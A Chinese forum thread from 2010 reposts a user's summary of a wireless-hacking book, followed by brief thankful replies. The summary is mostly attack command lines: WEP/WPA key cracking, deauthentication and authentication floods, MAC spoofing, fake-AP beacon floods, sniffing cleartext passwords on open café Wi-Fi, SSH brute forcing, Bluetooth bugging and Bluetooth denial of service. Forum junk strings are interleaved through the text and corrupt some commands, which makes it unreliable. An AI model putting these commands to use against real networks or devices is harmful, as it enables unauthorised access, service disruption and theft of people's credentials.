ubnt解决方案
查看: 14793|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

1306

回帖

3778

积分

439 小时

在线时间

少校

灌水天才

注册时间
2008-11-14
金币
2275 个
威望
7 个
荣誉
6 个
累计签到:14 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2010-2-10 10:59 |显示全部楼层
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。% {0 U- _6 f2 b: {; R* p

! w3 Q" ~) z& ?以下所有操作均在BackTrack 4中进行。
+ `7 Y9 q7 ?& L# ~" _$ E, I
; A4 r9 l" P. ~/ m
6 b" v9 C3 l* ~无线WEP加密P解:
. S( |- d% U0 _9 K- F: c2 N# x6 E0 M. T+ R$ m. [: f
注入P解:, f0 z  g# c2 Z- c( K7 K! S
( z* w5 O! p5 I' k0 w( q
ifconfig8 \$ B3 e  w$ f
7 T2 }& |, B2 b
ifconfig –a
! Z/ w) W9 i' L2 D8 v
6 `8 T3 @( t  n. Xifconfig wlan0(无线网卡) up
! Y3 |: |- J  s/ v0 d% g
& Q* N% N) W; G  o* ^8 aairmon-ng start wlan0
+ \6 B* _! M# X3 O' p  q& b1 t" d& \, A; S: s3 b2 ?. j, E
airodump-ng mon0/ M% W& r  O# U1 |: y0 K3 v

/ V/ Q( h9 {. {% Z* ^8 [airodump-ng --ivs –w ivsfile –c 频道 mon0或
' H2 ?+ s9 d+ m7 a9 g$ S+ A9 Z, w# Q# m4 U0 M& |/ a7 d
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon01 C; R" Z. V3 [& t& J# f8 X

3 A* Z$ \+ Z+ F* F) Saireplay-ng -3 –b BSSID –h Station mon0
3 z7 o' B6 k2 h' v' z' k1 q0 I
# r+ B) ]# s$ caircrack-ng ivsfile-01.ivs4 S: f4 o/ Z# G% f1 \, a* F: n
9 _. y2 \) e& x" P2 t' E5 z
虚连接P解(适用于无客户端连接APP解)
! H/ V, |. K3 O" P6 X+ r1 F8 O7 v/ k; h% u
ifconfig
  D7 u' V" t' r( f# y" a
& `6 q% W" H, [8 w9 Cifconfig –a
. s" s5 ?# c' ~3 {8 }$ `! y- e4 V2 a) H0 M( w7 g8 y* ]
ifconfig wlan0(无线网卡) up& S$ X) t9 m+ R% V0 F

3 |  K- T# u2 j. r% N! bairmon-ng start wlan0
! B' l3 t# D% R" S* h( f$ `7 P  _7 O- Q% x* o
airodump-ng mon0
' a, `/ g% f$ L# g8 p2 p0 ^3 Y2 ], y  _8 T7 z
airodump-ng --ivs –w ivsfile –c 频道 mon0或
( m5 r( b$ C  a7 A' H! m" r! ?/ \4 T7 S  p# R2 Z
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
3 Y" N0 _% X& ~0 L) Z5 v* _
) W  @/ `6 i# k8 ]' q: ?+ @! Taireplay-ng -1 0 –e SSID –a BSSID –c Station mon0. v% b+ m" i  m0 {/ \7 C

$ S# A8 s# b7 Haireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon08 @6 J0 Q" q. b6 ~0 d5 [6 I

; B+ i# D  ?' F4 qaircrack-ng ivsfile-01.ivs( \+ \: d% I, f- A6 g" f
8 p6 t+ l* B. A: o# _$ O* |

: k3 e; \5 t6 k6 t还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。
) A1 t6 F9 i- T( ^0 n) v5 [
# i) T3 n# j7 N/ e+ o4 O/ P" b" u- J% e5 k
WPA-PSKP解
7 L2 q: n! C5 ?) B" l! {
1 ~$ V! Y7 b! A" A1 F4 j$ Sifconfig
7 F2 K4 V! O2 R1 p$ N* D$ `* [' _& O- m$ B9 o/ ?/ W; q
ifconfig –a
3 F. J6 |. {. G5 Z
# E. T( E6 H+ {6 J# ?ifconfig wlan0(无线网卡) up
! r2 ~9 L2 I0 M* h6 N/ [" W' e0 I
4 V- ]8 O% l8 ^airmon-ng start wlan0
0 S9 f; l) P2 P$ q: \9 K
9 x1 S+ c7 D' n1 W; [8 Oairodump-ng mon0
2 x# {1 g, d) s# @$ }- b2 t% n5 X. Q$ d! X
airodump-ng –w capfile –c 频道 mon0
) ^3 ]' h2 ~8 G' B" @3 C6 i# e; X- `& o3 T
aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包
: f) Y$ h7 K9 C+ p/ w% }% o2 Z( W; v3 \+ G3 _1 x# `% I$ E
aircrack-ng –w Dic capfile-01.cap或
$ o2 e- U% P+ h/ Q" x! g- M5 F3 p! H6 V7 t4 _
cowpatty –f Dic –r capfile-01.cap –s SSID
" X  s) d5 r8 j+ N- ]% C, c& S$ }  w+ J- J2 n
cowpatty –d HashTable.Hash –r capfile-01.cap –s SSID5 z+ K* ]3 |, ?& d" t
8 L) q3 v& |7 y* Y  `6 i
傻瓜式P解软件SpoonWPA。8 [! q* }2 ]/ k9 z

9 y% r# h- W! i7 dBT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst2 x; g7 H9 f% U; T+ M; E6 d& v0 _* t
, c9 f* H/ B4 Q% s$ o& |$ w3 W7 h

4 u5 }3 U, {7 H: k8 b" q字典文件的生成和上传/ _, r& e$ A& O6 V  y/ k
. I, K! A0 M3 o1 c
在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。" x$ F1 M, ]9 |# [3 C3 ]/ ]8 l  \
; A2 x, j9 w" y+ s+ H' C

& i7 F; {, n+ E( j8 ~BT4下开启Tftp:Services—TFTPD—start TFTPD$ F1 Q4 D  A) O! |: n

- }# Y5 W  v) @8 o3 w0 H4 i( t6 L在Windows的CMD中运行 tftp –i IP put **.dic7 a; p3 U% G- k1 z- V4 O+ l" x

  c7 u& O; D# o
+ d( o. n( Y% D  |$ ]3 E6 s; J8 \BT4下开启SSH:Services—SSH—start SSH$ @) T/ W+ N% W+ t& n( g
, H+ i3 }  N" N" i# U) f5 o9 l1 z1 ~
Windows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root/ X1 l& ~) y& }* r: \+ N& n
& M: {$ ~. c3 q8 [% }. q
/ \) o6 M) T, }2 U. P7 o
AP限制MAC时的解决6 G" O1 V, p/ n( H: Z
- D7 q* X' V/ z3 j3 j1 A1 {
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:$ x1 ?- j" H+ ^
6 j, [! w% S% B  H
ifconfig wlan0 hw ether NewMAC* U% i: f  k0 s( g
/ u+ ]- C. O  P- C( @: o

8 k3 g! \6 p/ S% @0 N* N  t关闭SSID广播的AP探测:
) g+ }0 E) d5 _" c' B, F
* n; Z2 H& J8 R' k1.     Deauth攻击:
, m8 z7 @  i- r- q6 R6 S( W- w4 d+ k4 K# W/ I
airodump-ng mon0
; B, y' p4 g( B3 \& m) n
$ t2 {0 s5 r3 ~) \8 s+ M5 O; Raireplay-ng -0 10 –a BSSID –h Station mon06 N: d: _& g* T7 |) ^
; f( [# C* f) r9 M, B  l- C
2.     抓包分析
/ T, i/ ^* q  `+ d8 Q- E3 G- _9 y
1 v3 V0 E$ H4 C2 O' v  eOmnipeek2 E$ d% Z  a' k; V; d

' O; d' I' Z; M& y! c( t) ]Tcpdump –n –e –vvv –i 网卡名% i7 T- @6 P9 x* @! [7 e* y8 {
# b, w  \: e. Z/ k  M( L$ h7 O- k0 w% x2 [
3.     暴力P解
! e: a4 Q% g4 D" Z! L9 k; D' c( k; u! _. @" H( i  `& d
Charon 1.1暴力P解
+ K; E0 j  z5 e5 Y: j& I5 x0 @6 L' r
) ~% `* I! m+ b0 ~' D4 e; ^
8 U6 Y2 n4 p# h6 n+ Y, i7 @无线加密数据包的解密# f9 }3 b& x5 |0 F* w0 ]

/ r+ [2 \* k* G  @( o+ p/ i- D* z- }  o
使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
  f1 w& c! q8 `0 H
0 |4 R5 E- j2 _/ L& {4 j& RFilterNS     DNS解析数据包
9 Y- q7 w* t/ a0 z+ a3 U
; d% b( }. @1 i- CFilter:HTTP    WEB访问数据包; j7 U( Q# U: q
( i( w: L1 I3 o( l- b- U6 E/ _2 `
Filter:msnms   MSN
3 O( d, N: h7 c2 o1 p% o% W  o' _: ^6 ^3 z) ^+ q  W' R
Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。5 b# e9 b! T3 X& x( k' N8 G* i2 F; }

4 F: R+ ^7 J  C, j% g: K" P: ]8 w/ m使用airdecap-ng解密:( H# ?# f" k$ K; ]2 a& E

* G# c* u( P3 O4 {% L0 ?Airdecap-ng –b BSSID –e SSID –w 密码 ***.cap
, B: w8 D+ a8 O- V+ ?6 J- h; S, R* H, h7 ?
! ?. f2 g) q, `& l5 f% {, _
咖啡馆中无线数据截取(开放式无加密AP)( E9 a2 f9 D; A

3 |2 S6 e. ^; |- X1.Airodump-ng –w data –c频道 mon0' n, }/ V) J  l& x& }( ?. r

( N+ x1 N. Q6 j) ?2.使用WireShark打开分析1 S% T' P: F' y/ X; o

/ s1 `6 \9 R. D6 G4 x! O# _& L, L' q7 k9 v- }
BT4下的渗透工具:
" b; t  B% t8 R( }  a
+ X# x  Y3 s/ i/ f1 B( jnmap –sP IP/24        判断C段下存活的主机 $ P- R3 @9 P" `% f

4 `* ~% S0 j& w8 ?3 X, enmap –vv –sS IP/24 –p Port    扫描指定端口是否开放1 }8 n+ F$ c* @5 L* E1 G

  `! ~& O9 b" G: h7 I& M$ ^nmap –vv –sV IP –p port   指定端口的详细信息。。。
# M  G+ }9 T* C6 h4 A
7 l( s6 D% q& a6 t/ Cnamp –O IP/24    判断主机的系统版本; Q# Z/ X, N4 J2 M: s" `$ A3 e
* d4 D' ?* C/ i& b' n
1 B# D5 U( X6 W2 j. \3 y
GUI 版nmap:Zenmap , ?, K7 o1 |4 l3 |5 h

0 W( W0 y* G5 q5 O: o/ K9 |  s- P3 A% X/ m/ j
Amap使用:amap –B IP port: k4 k" s3 V. ~! u3 g2 u
1 \! L( H- }5 j1 \7 r
Nbtscan(扫描Windows网络NetBios信息):& s  d% s7 V$ V' `

7 I) f8 ^' C/ j8 p! Q6 Knbtscan –v –s : IP/24
. E8 N$ p5 J. _5 v6 Z, ~
7 o2 T3 a# Z2 C$ Z9 M, i8 c2 `  Hnbtscan –r IP
: R$ `- P: X6 N& ?7 a1 k$ s1 z+ S) W
  A& r9 E4 b% t* S6 Y  a' _
! H- |0 x$ X8 m% |2 KDNSWalk(指定域名的DNS探测):./dnswalk XXX.com.6 Q/ i5 S8 Z- f, A- U: G1 J* F

; F" b: ?- }) P$ P# `  e3 ]0 L. }8 l6 W/ J7 i' J, U
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks); s; X/ w# w8 N  a& a4 N- H% g8 V

3 N9 R3 y# c6 d0 JBruteSSH: ./bruthe.py –h IP –u Username –d Dic
! I, D: ?! B8 n5 k  P. c( m
# X. U/ |. R) t% F7 ], \  d- aMetasploit3使用1 H7 O3 r. H' W$ H" `" z5 e
无线D.0.S. _1 R2 o0 N1 R3 _6 o& T$ j, w

6 D  o  R; C7 z( m. u) d0 T2 ]% s9 L1 P- a" d, \3 N
Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)
; G8 O: n7 a3 d5 q0 r' _; q
* Q6 S9 h* ?& jairmon-ng start wlan0, y" ^# ~, i' W( C) Q
) ^( C3 @. `+ ?% @6 {
airodump-ng mon0: X: [7 R( [1 H# f$ g+ n

+ p7 @# M* {# L9 Bmdk3 mon0 a –a BSSID
! h" b# |" x9 o! a0 H9 s4 y) K
8 L( U/ [- N; x/ f! ^2 m% Y对所有的AP攻击:mdk3 mon0 a* E4 s$ V% @2 H9 [$ ]% S
* r' {: y2 _5 U  q( p

/ _- M$ w  G" |" eDeauth Flood 攻击5 W" @8 ~8 r& }

7 i4 L! p- t$ c' v0 y1 Emdk3 mon0 d –c Channel- T& \' d0 G  N8 j( t2 {& \

% g, ?1 }- P! u* L图形化D.O.S攻击:Charon
4 T0 w8 o0 f  |0 l% X! j4 y- }- k3 e: x5 a8 F  b
5 {; D: L5 [3 \2 G
当受到攻击时,使用Wireshark抓包可以看到异常信息。
4 v0 _! t9 v( l  I  W& ^5 i5 ~3 q# I4 H4 ], V# u2 Z4 V3 v
$ G  N9 g3 J( C  y) R2 U
WPA-PSK高速P解# c% g9 p  @$ Q8 K  A7 C7 ~+ E+ Y6 P

6 G) u9 p% C$ \* W- K1.       WPA-PSK PMK Hash TablesP解9 w+ s$ B2 F* D: h( Q7 a! l% |
. N) {  @7 m$ a  q  [6 E
Cowpatty –d HashTable.hash –r ***.cap –s SSID, z) z' H. @+ d: x" o8 f3 C
" E/ N( z( g- g0 A+ h% ?; R
Hash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
4 l: k- L0 l9 Z( i+ [$ Q& g2 E6 N: z. U; O, y( f, u5 C  Z. }
2.       GPU辅助高速P解
0 ]5 h: ~: N7 c! T5 s1 c' p% h
( c1 j+ d# ^) V' S2 g5 q2 N6 G使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。
3 E% A# R, [3 d/ t4 {" _# v7 S, T# O- y5 K( o2 u
3.       分布式P解
$ z7 E4 x" A# b( J, d. |: A. f3 C4 A

* s1 _/ `. o* F5 T5 wAP的伪造$ q! ~& ~+ ?, {, `9 }: p- w
5 `3 F! [6 o3 P( A& [
把AP的MAC改成目标AP的MAC
" H$ \4 Z" m' [5 {5 F3 d" b' l; N$ [
网卡软AP( J% }. q* ^: ^/ n! y( O
' ]9 _4 R  W+ {

+ A3 r1 J1 g& F2 ~! U+ F+ R: _; h伪造大量虚假AP信号:; u7 f9 E# z# p) T% L2 h9 {
0 N# v! R1 [7 W. |
随机SSID:mdk3 mon0 b –g –c 频道
5 Q/ X4 \0 v8 J
' M! e4 H8 x5 w% Z' V  W3 X  u指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度1 h0 ]# Y8 B7 ?* M% b; V
9 z& k1 K& P8 |2 T1 y5 g# W
/ U  O/ ]$ A, Y2 Q3 \- _
War-Driving% b8 M! b1 K, o

! _) g5 Y. R, a# I% Y, C' d热点地图绘制: P6 @7 a8 p9 c
; ?* Y: ]' M& {; d/ D, B  W7 U
Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。7 U3 \* x8 Q7 I- }

2 F- F; }  m3 r+ b1 _- l3 [7 K8 p# K5 b1 Q5 ]
Netstumble* P, m8 R& ~: ]3 Y2 C( H, @8 @+ l
0 D. f4 x8 g7 |5 I0 \
% c$ m3 L. h6 t) ~$ M% L
蓝牙Hacking
$ o$ ]9 p( Y% m" u  c, j# R% J# r. g; J
Windows下的Blue Soleil工具7 S( |9 _7 b/ f- N

% P# \: C" H7 ^% ?7 g$ y, A! {BT4:
& @2 X/ A: w. b, X3 E' _- t1 B
) @8 X8 ^& j9 W1 hhciconfig 查看蓝牙适配器
( P* V' O. S% x! @. h. B: @# G) |* F( f4 Q. p$ f7 F. L6 O8 v+ r. Q
hciconfig hci0 up 载入蓝牙适配器
7 L7 r- e% n+ ~9 a8 q/ M" N5 c
4 k. M8 z. [9 h* ?( h  Z$ a6 Jhciconfig hci0 class 蓝牙适配器详细信息
5 @4 \  W$ u% g5 e1 j0 Q$ M( B# v+ Q5 o* Y& Q
# h% @0 ]( W( G
hcitool(扫描蓝牙)
' Z5 \9 M2 c7 V: r4 Z/ j5 B; f+ f! _2 |
hcitool –i hci0 scan2 c" H4 ~9 b: i" N7 u% Z$ O

- m5 P1 Z- M% X, O5 w4 I- dBTscanner(扫描蓝牙)
: F# N- g9 l8 ~* k. ]" S! T6 f
0 X9 c: T# R( D. R- q; t* N" m* o$ W0 g, j% K
蓝牙攻击:
2 i7 r! h' O6 E# Q* \* X. y1 e& {  i3 Q' `1 o2 W
BlueBugging (适用于BlueTooth V1.1的手机)
+ q& v2 u+ R' O& U& @. T
; S/ c: h' n% J, _( N* W- zBluebugger工具:
" c/ V* D' J  F# O
, m% l, U/ V% |1 s$ hBulebugger –a HD_Addr info
" H9 z% t. b- G7 x5 K: ]
8 |7 X  C6 p) o9 P6 m8 S
2 o4 K) h8 \( g. f1 RBlueJacking
$ j: J2 ^/ o2 K" \8 ?5 F
) z* z1 s% B4 G7 R  Q实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。, ?# S8 f( W! _- v

$ d8 ]! c' G& u0 N. }" c
- ]: I4 [7 ~' _+ m% R# `# u8 A5 sHD_Addr修改:
, \& J# k0 n  ?) \1 \* S7 X3 X; L( f3 S
Bdaddr工具
* _& M: t& m/ \3 M
; j! w+ d; u; y) o8 Lbdaddr –i 蓝牙设备名 新HD_addr
% Z/ N1 f  m) F. U9 d1 ^# B' A" b. B$ N+ Q! r5 O* U3 R
' F& V. q7 D$ I# E" t) i
蓝牙D.O.S6 b2 m6 T. Q9 g
. p+ h- \! W7 b1 F& M) ?
l2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务
* e5 {) K4 p/ s% x  w( D  p+ I! P7 J; J+ J
hciconfig1 w2 S/ C* L0 H6 P8 p+ V& Q, N
* g6 `' ?" i+ v
hciconfig hci0 up+ N+ }$ y/ T  A! `

2 \3 ?8 g7 u0 x  O3 _6 p/ ghcitool –i hci0 scan
& @6 Z0 l/ K1 Q# \" Q( ~- Y2 M/ Q: T% u" {
l2ping –s 10000 –目标MAC
* o8 ~# S. g  K' O4 F
2 D) l5 C' b  ?* T' L+ R
8 g0 x) b1 N! ^+ @0 v1 g4 w不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)+ o  Q4 y) \" ?3 |! {. V4 J  D9 C
1 K% S& a7 ~% x" K
./fang –r ************-############ -s, o# n" A; `" x. H
! B5 M8 P+ _2 N, \% z% J4 i
暴力P解************-############的蓝牙设备
8 D6 n- [: B" j
: Q) i' T* M7 N! E./fang –l 各厂商BD_Addr分配
* ^& a, x0 X& K) R
5 F' C: O: U% \: {- W
/ m+ o1 @: r* M- C  WWifiZoo使用$ f3 E8 w1 ]4 u& J* k
! |0 X5 y3 O- ]
./wifizoo.py –c Capfile
4 H5 e" [! K# @, G3 |& ]2 R: x, a* A* E1 ^9 C$ ^: p' j( d
访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

176

回帖

850

积分

49 小时

在线时间

中尉

注册时间
2009-10-19
金币
656 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

56

回帖

143

积分

10 小时

在线时间

上等兵

注册时间
2008-12-18
金币
86 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

374

回帖

2298

积分

114 小时

在线时间

少校

注册时间
2009-7-5
金币
1841 个
威望
8 个
荣誉
0 个
累计签到:2 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

561

回帖

1138

积分

25 小时

在线时间

上尉

注册时间
2010-1-28
金币
566 个
威望
0 个
荣誉
0 个
累计签到:5 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

111

回帖

262

积分

61 小时

在线时间

少尉

注册时间
2010-2-6
金币
131 个
威望
2 个
荣誉
0 个

尚未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

70

回帖

763

积分

36 小时

在线时间

中尉

注册时间
2008-3-8
金币
687 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

266

回帖

960

积分

539 小时

在线时间

中尉

注册时间
2010-2-20
金币
592 个
威望
5 个
荣誉
1 个
累计签到:13 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

57

回帖

92

积分

14 小时

在线时间

上等兵

注册时间
2010-1-25
金币
32 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。6 g: N5 I, B0 d* S: R7 u; {
借来看看。
回复

使用道具 举报

52

回帖

159

积分

19 小时

在线时间

上等兵

注册时间
2009-6-29
金币
103 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的5 _; e+ Y1 K6 S1 h, [, T2 P
呵呵 其实也不贵 21块 快递再一点
/ ]& V7 |( A4 `; P2 x6 q8 T2 n: T我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

289

回帖

449

积分

105 小时

在线时间

少尉

注册时间
2010-1-14
金币
134 个
威望
1 个
荣誉
0 个

尚未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

22

回帖

157

积分

7 小时

在线时间

上等兵

注册时间
2010-2-25
金币
134 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册 微信登录

本版积分规则

站点统计 | Archiver | 手机版 | 无线门户 ( 粤ICP备11076993号|粤公网安备44010602008359号 ) |网站地图

GMT+8, 2024-12-27 00:43

返回顶部 返回列表